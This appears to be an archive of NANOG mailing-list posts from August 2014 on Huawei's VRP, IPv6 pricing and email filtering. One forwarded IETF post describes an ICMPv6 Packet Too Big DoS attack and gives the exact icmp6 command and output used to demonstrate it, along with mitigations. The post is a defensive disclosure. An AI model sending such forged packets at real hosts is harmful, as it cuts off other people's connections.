Re: Huawei's Versatile Routing Platform (VRP)

[Nikos Mouat]

Hi Colton,
   I've been recently looking at the Huawei 12808 switch - I'm not sure 
if it's the same OS as the routers, but so far I've had a positive 
experience.
   I would say it's not very close at all to IOS - other than being 
command line - perhaps closer than Extreme's OS, but not by much.
   That being said, the '?' and tab keys are helpful, and if you 
understand the concepts, you can usually find the right knobs to turn. In 
addition, at least for me, the Huawei teams have been extraordinarily 
helpful in providing configuration templates and support.
   I think someone commented that it doesn't mix well with Cisco - I would 
throw in that that's probably only based on the fact that Huawei does not 
support PVST.


Thanks,
Nikos

On Tue, 19 Aug 2014, Colton Conor wrote:


How does Huawei's Versatile Routing Platform (VRP) operating system that is
on their switches and routers compare to Cisco IOS or Juniper JunOS? Is the
CLI syntax similar? How is the overall feature set? Would a tech that knows
cisco be able to understand Huawei fairly easy?

The pricing and feature set for Huawei's products are impressive, but no
one ever seems to talk about their products? They claim to have multiple
routers that smoke Cisco and Juniper platforms.We are talking Tbps
platforms. What are the overall thoughts on Huawei?

Re: Huawei's Versatile Routing Platform (VRP)

[nanog]

It works fine
The cli syntax is quite similar to iOS in shape, but keywords are different
You won't (almost) understand everything on the fly, reading to
documentation in *not* an option (is it somewhere ?); By the way,
Huawei's documentation is a bit ugly, not as versatile as Cisco's; You
will have troubles to understand some features if you are "new" with
these (eg protocols, techs etc). If you master these, I guess the docs
will be more understable for you.

I did not used them for routing but switching, they are really
performing good

If you plan to buy such product, keep in mind these points:
- don't mix Huawei & cisco (or anything else), you might have trouble
(as you'll get with any other constuctor mix)
- low cost switches seems to be less awesome that high-end products; You
may get more "not working" unit;



On 19/08/2014 21:34, Colton Conor wrote:
> How does Huawei's Versatile Routing Platform (VRP) operating system that is
> on their switches and routers compare to Cisco IOS or Juniper JunOS? Is the
> CLI syntax similar? How is the overall feature set? Would a tech that knows
> cisco be able to understand Huawei fairly easy?
> 
> The pricing and feature set for Huawei's products are impressive, but no
> one ever seems to talk about their products? They claim to have multiple
> routers that smoke Cisco and Juniper platforms.We are talking Tbps
> platforms. What are the overall thoughts on Huawei?
> 

Re: Urgent

[Tom Hill]

On 19/08/14 22:43, Tom Hill wrote:
> Looks like I owe you a beer or two, Randy. :)

Or, more accurately, some happy soul has nominated that you shall
receiveth said beer tokens, by fortune of spoofed e-mails.. ;D

Tom

Re: Urgent

[Tom Hill]

On 18/08/14 18:00, ra...@psg.com wrote:
> Contact for God, please reach out to me offlist.

 [18:12:24] 12:38 <@teh-35425> Beer tokens to the man
that puts in a request to nanog-ml for 'Contact for God, please contact
me offlist'
 [18:12:36] teh-35425, looks like you owe rbush some
beer tokens

Looks like I owe you a beer or two, Randy. :)


Tom

Re: Huawei's Versatile Routing Platform (VRP)

[Saku Ytti]

On (2014-08-19 14:34 -0500), Colton Conor wrote:

Hi,

> How does Huawei's Versatile Routing Platform (VRP) operating system that is
> on their switches and routers compare to Cisco IOS or Juniper JunOS? Is the
> CLI syntax similar? How is the overall feature set? Would a tech that knows
> cisco be able to understand Huawei fairly easy?

If they know IOS they just need to change the nouns to some synonym and it's
the same.
And generally, if you know what you're doing, it's perfectly workable CLI. By
far nothing to write home to, but generally relying to CLI means there are
large inefficiencies in your process to address.
Overall the design is quite like IOS XE today, linux where single flat process
'vrp' does all the heavy-lifting.

> The pricing and feature set for Huawei's products are impressive, but no
> one ever seems to talk about their products? They claim to have multiple
> routers that smoke Cisco and Juniper platforms.We are talking Tbps
> platforms. What are the overall thoughts on Huawei?

I recently opened Huawei AR router which is essentially competing with Cisco
ISR and to lesser degree with Juniper SRX. To my surprise it was all wastern
quality kit, emmerson PSU, marvell ethernet chip, cavium octeon NPU/CPU, so
pretty similar to SRX in HW terms.

CX competes with ASR9k/MX, and NE as far as I know is like CX but more
core-focused marketing (like JNPR T is like MX for people with too much money)

I personally wouldn't have trouble committing heavily on Huawei kit if
economics otherwise make sense (training, systems, etc)

-- 
  ++ytti

Huawei's Versatile Routing Platform (VRP)

[Colton Conor]

How does Huawei's Versatile Routing Platform (VRP) operating system that is
on their switches and routers compare to Cisco IOS or Juniper JunOS? Is the
CLI syntax similar? How is the overall feature set? Would a tech that knows
cisco be able to understand Huawei fairly easy?

The pricing and feature set for Huawei's products are impressive, but no
one ever seems to talk about their products? They claim to have multiple
routers that smoke Cisco and Juniper platforms.We are talking Tbps
platforms. What are the overall thoughts on Huawei?

Re: QOS improvement suggestion for NANOG list members

[Mike A]

On Tue, Aug 19, 2014 at 06:09:50PM +, Sholes, Joshua wrote:
> Doesn't everyone do that?
> 
> NANOG was the list that taught me, twelve years ago, that I would suffer
> terribly if I didn't pre-sort individual mailing lists into their own
> folders. =)

Procmail, while not all that _friendly_, can be *useful*.

-- 
Mike Andrews, W5EGO
mi...@mikea.ath.cx
Tired old sysadmin 

Re: QOS improvement suggestion for NANOG list members

[Sholes, Joshua]

Doesn't everyone do that?

NANOG was the list that taught me, twelve years ago, that I would suffer
terribly if I didn't pre-sort individual mailing lists into their own
folders. =)

-- 
Josh


On 8/19/14, 1:44 PM, "Doug Barton"  wrote:
>
> or, learn how to filter e-mail into folders like the big kids. :)
>

Re: QOS improvement suggestion for NANOG list members

[Doug Barton]

On 8/19/14 7:15 AM, Rob McEwen wrote:

RE: QOS improvement suggestion for NANOG list members

Go to the search feature of your e-mail, and search for all messages
from the NANOG list that has the word "URGENT" in the subject line...
then delete them! Then, there will be a LESSER chance of overlooking a
truly urgent messages from your own customers! (and hopefully that
thread will die soon! Otherwise, you may need to repeat this every
couple of days for a hopefully short while.) This might improve the
quality of service that you provide to your own clients.


 or, learn how to filter e-mail into folders like the big kids. :)

Fwd: DoS attacks (ICMPv6-based) resulting from IPv6 EH drops

[Fernando Gont]

Folks,

FYI -- currently being discussed on v6...@ietf.org

Cheers,
Fernando




 Forwarded Message 
Subject: DoS attacks (ICMPv6-based) resulting from IPv6 EH drops
Date: Tue, 19 Aug 2014 09:00:15 -0300
From: Fernando Gont 
To: IPv6 Operations 
CC: 'op...@ietf.org' 

Folks,

Ten days ago or so we published this I-D:


Section 5.2 of the I-D discusses a possible attack vector based on a
combination of "forged" ICMPv6 PTB messages and IPv6 frag drops by
operators, along with proposed countermeasures -- on which we'd like to
hear your comments.

Since Section 5.2 is in the draft, let me offer a more informal and
practical explanation:

1) It is known that filtering of packets containing IPv6 Extension
Headers (including the Fragment Header) is widespread (see our I-D above)

2) Let us assume that Host A is communicating with Server B, and that
some node filters fragments between Host A and Server B.

3) An attacker sends a spoofed ICMPv6 PTB to server B, with a "Next Hop
MTU<1280), in the hopes of eliciting "atomic fragments" (see
) from now on.

4) Now server B starts sending IPv6 atomic fragments... And since they
include a frag header (and in '2)' above we noted that frags are dropped
on that path), these packets get dropped (i.e., DoS).


"Demo" with the icmp6 tool
() -- (some addresses have
been changed (anonimized), but it is trivial to pick a victim server...)

"2001:db8:1:10:0:1991:8:25" is the server, and
"2001:5c0:1000:a::e7d" is my own address):

 cut here 
* First of all, I telnet to port 80 of the server, and
everything works as expected 

fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25...
Connected to 2001:db8:1:10:0:1991:8:25.
Escape character is '^]'.
^CConnection closed by foreign host.

 Now I send the forget ICMPv6 PTB 

fgont@satellite:~$ sudo icmp6  --icmp6-packet-too-big -d
2001:db8:1:10:0:1991:8:25 --peer-addr 2001:5c0:1000:a::e7d --mtu 1000 -o
80 -v
icmp6: Security assessment tool for attack vectors based on ICMPv6 error
messages

IPv6 Source Address: 2001:5c0:1000:a::e7d (automatically selected)
IPv6 Destination Address: 2001:db8:1:10:0:1991:8:25
IPv6 Hop Limit: 227 (randomized)
ICMPv6 Packet Too Big (Type 2), Code 0
Next-Hop MTU: 1000
Payload Type: IPv6/TCP (default)
Source Address: 2001:db8:1:10:0:1991:8:25 (automatically-selected)
Destination Address: 2001:5c0:1000:a::e7d
Hop Limit: 237 (randomized)
Source Port: 80 Destination Port: 38189 (randomized)
SEQ Number: 734463213 (randomized)  ACK Number: 866605720 (randomized)
Flags: A (default)  Window: 18944 (randomized)  URG Pointer: 0 (default)
Initial attack packet(s) sent successfully.


* And now I try the same telnet command as above... but it fails,
because the frags from the server to me are getting dropped somewhere 

fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25...
[timeout]
 cut here 


Of course, in this particular case I just "shot myself". But one could
do this to DoS connections between mailservers, etc.

A nice question is: what if e.g

1) some BGP servers accept ICMPv6 PTB that claim an MTU < 1280, and
react (as expected) by generating atomic fragments, *and*,

2) These same BGP servers deem fragmentation as "harmful", and hence
drop such fragments

you could essentially DoS traffic between them

As noted in the I-D, the mitigations seem to be:

1) Artificially limit your packets to 1280, and drop all incoming ICMPv6
PTB, or,

2) Have your device just drop ICMPv6 PTB that claim a Next-Hop MTU
smaller than 1280.

Thoughts?
-- 
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492







-- 
Fernando Gont
e-mail: ferna...@gont.com.ar || fg...@si6networks.com
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1

Re: Akamai charges for IPv6 support?

[Valdis . Kletnieks]

On Tue, 19 Aug 2014 14:32:38 -, "Eric C. Miller" said:
> I thought that keeping up with the times is part of basic necessity of 
> business.

Yes, but here in the US, a precedent got set when some communications companies
got given really sweet deals to encourage them to deploy next-gen broadband,
and the companies instead pocketed the money.  We're kind of stuck with this
sort of thing until Wall Street stops emphasizing quarterly profits over
long-term strategic development.



pgpQ8jgzVCwaD.pgp
Description: PGP signature

RE: Akamai charges for IPv6 support?

[Eric C. Miller]

I thought that keeping up with the times is part of basic necessity of business.



Eric Miller, CCNP
Network Engineering Consultant
(407) 257-5115



-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Matthew Kaufman
Sent: Monday, August 18, 2014 10:48 PM
To: Alejandro Acosta
Cc: nanog@nanog.org
Subject: Re: Akamai charges for IPv6 support?

I guess you expect infrastructure to build itself for free?

Matthew Kaufman

Sent from my iPad

> On Aug 18, 2014, at 7:30 PM, Alejandro Acosta 
>  wrote:
> 
> 
> 
> El 8/18/2014 12:23 PM, Aaron Hopkins escribió:
>> On Mon, 18 Aug 2014, Mehmet Akcin wrote:
>> 
>>> What did they say when you asked them(Akamai)?
>> 
>> I quoted their response in my mail; sorry if that wasn't clear.  They 
>> offered to enable IPv6 service for a non-trivial monthly recurring 
>> fee, which they offered to send me a revised contract to include.
> 
> it's so sad to hear this in August 2014
> 
>> 
>>> I would imagine ipv6 to be included in price not an additional fee.
>> 
>> I was surprised to find that wasn't the case.
>> 
>>-- Aaron

Re: Urgent

[Michael Hallgren]

Le 19/08/2014 16:08, William Herrin a écrit :
> On Mon, Aug 18, 2014 at 3:57 PM, Michael Hallgren  wrote:
>> Le 18/08/2014 20:38, Jeroen van Aart a écrit :
>> -Original Message-
>> Contact for God, please reach out to me offlist.
>>
>> Regards,
>>  -AS666 NOC
 --
>>> OP is a troll,
>> Sure? :-)
> Definitely.
>
> The message may _also_ have a forged sender. ;)

Yep, was joke/irony :-)

Cheers,
mh

>
> -Bill

QOS improvement suggestion for NANOG list members

[Rob McEwen]

RE: QOS improvement suggestion for NANOG list members

Go to the search feature of your e-mail, and search for all messages
from the NANOG list that has the word "URGENT" in the subject line...
then delete them! Then, there will be a LESSER chance of overlooking a
truly urgent messages from your own customers! (and hopefully that
thread will die soon! Otherwise, you may need to repeat this every
couple of days for a hopefully short while.) This might improve the
quality of service that you provide to your own clients.

-- 
Rob McEwen
+1 (478) 475-9032

Re: Urgent

[William Herrin]

On Mon, Aug 18, 2014 at 3:57 PM, Michael Hallgren  wrote:
> Le 18/08/2014 20:38, Jeroen van Aart a écrit :

> -Original Message-
> Contact for God, please reach out to me offlist.
>
> Regards,
>  -AS666 NOC
>>> --

>> OP is a troll,
>
> Sure? :-)

Definitely.

The message may _also_ have a forged sender. ;)

-Bill

Re: Urgent

[Joel M Snyder]

> OP is a troll, best to ignore and block:

Be nice.  Randy can be abrasive, but calling him a troll seems out of 
line.  I like to think of him as a hobbit with shorter temper than 
average.


Not everyone here will agree with me :-)

jms
--
Joel M Snyder, 1404 East Lind Road, Tucson, AZ, 85719
Senior Partner, Opus One   Phone: +1 520 324 0494
j...@opus1.comhttp://www.opus1.com/jms